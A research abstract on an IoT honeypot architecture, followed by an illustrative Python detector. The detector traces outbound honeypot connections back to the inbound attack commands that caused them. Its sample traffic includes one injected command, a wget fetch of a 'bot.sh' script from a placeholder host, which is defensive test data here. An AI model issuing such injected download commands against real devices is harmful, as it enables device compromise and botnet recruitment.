ABSTRACT
Attacks on Internet of Things (IoT) devices that exploit their inherent vulnerabilities have intensified over the last few years. Recent large-scale attacks, such as Persirai and Hakai, corroborate concerns about the security of IoT devices. In this work, we propose an approach that allows easy integration of commercial off-the-shelf IoT devices into a general honeypot architecture. Our approach projects a small number of heterogeneous IoT devices (physically located at one site) as many geographically distributed devices on the Internet, using connections to commercial and private VPN services. The goal is for those devices to be discovered and exploited by attacks on the Internet, thereby revealing unknown vulnerabilities. For detection and examination of potentially malicious traffic, we devise two analysis strategies: (1) given an outbound connection from the honeypot, backtrack through the captured network traffic to find the attack command that caused the connection, and use that command to download the malware sample; (2) perform live detection of previously unseen URLs in HTTP requests using adaptive clustering. We show that our implementation and analysis strategies are able to detect recent large-scale attacks targeting IoT devices (IoT Reaper, Hakai, etc.) with overall low cost and maintenance effort.
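As an added illustration of the first analysis strategy (not code from the paper), the following backtracking detector runs over constructed traffic records: given an outbound connection from the honeypot, it searches the inbound HTTP requests of the preceding time window for a command embedding a URL whose host and port match the connection's destination, and returns that command and URL for the analysis pipeline to fetch in isolation. The record types, field names, window size and sample log lines are assumptions made for this example.

```python
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote

# Hypothetical record types for captured honeypot traffic (constructed for this
# example, not the paper's own data model).
@dataclass
class InboundRequest:
    ts: float   # capture time in seconds
    src: str    # remote IP that sent the request
    raw: str    # decoded HTTP request line plus body

@dataclass
class OutboundConn:
    ts: float
    dst: str
    port: int

DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21, "tftp": 69}
URL_RE = re.compile(r"\b(https?|ftp|tftp)://([\w.-]+)(?::(\d+))?(/[^\s'\";&|]*)?")

def urls_in(raw: str):
    """Yield (url, host, port) for every URL embedded in a (percent-decoded) request."""
    for scheme, host, port, path in URL_RE.findall(unquote(raw)):
        yield (f"{scheme}://{host}{':' + port if port else ''}{path or ''}",
               host, int(port) if port else DEFAULT_PORTS[scheme])

def backtrack(conn: OutboundConn, inbound: list, window: float = 60.0) -> Optional[dict]:
    """Return the most recent inbound request within `window` seconds before the
    outbound connection that references the connection's destination host:port."""
    candidates = [r for r in inbound if conn.ts - window <= r.ts <= conn.ts]
    for req in sorted(candidates, key=lambda r: r.ts, reverse=True):
        for url, host, port in urls_in(req.raw):
            if host == conn.dst and port == conn.port:
                return {"src": req.src, "ts": req.ts, "command": req.raw, "url": url}
    return None  # no inbound request explains this connection

# Constructed sample traffic: one request carries a URL-encoded download command.
INBOUND = [
    InboundRequest(100.0, "203.0.113.5", "GET /index.html HTTP/1.1"),
    InboundRequest(150.0, "203.0.113.9",
                   "POST /cgi-bin/cmd HTTP/1.1\r\n\r\ncmd=wget%20http%3A%2F%2F198.51.100.23%3A8080%2Fbot.sh"),
    InboundRequest(151.0, "203.0.113.5", "GET /logo.png HTTP/1.1"),
]
OUTBOUND = [OutboundConn(153.0, "198.51.100.23", 8080), OutboundConn(400.0, "198.51.100.77", 80)]

def analyse(outbound=OUTBOUND, inbound=INBOUND):
    """One backtracking result (or None) per outbound connection."""
    return [backtrack(c, inbound) for c in outbound]
```

The second outbound connection has no matching request in its window and is reported as unexplained, which in practice is the case worth raising for manual review.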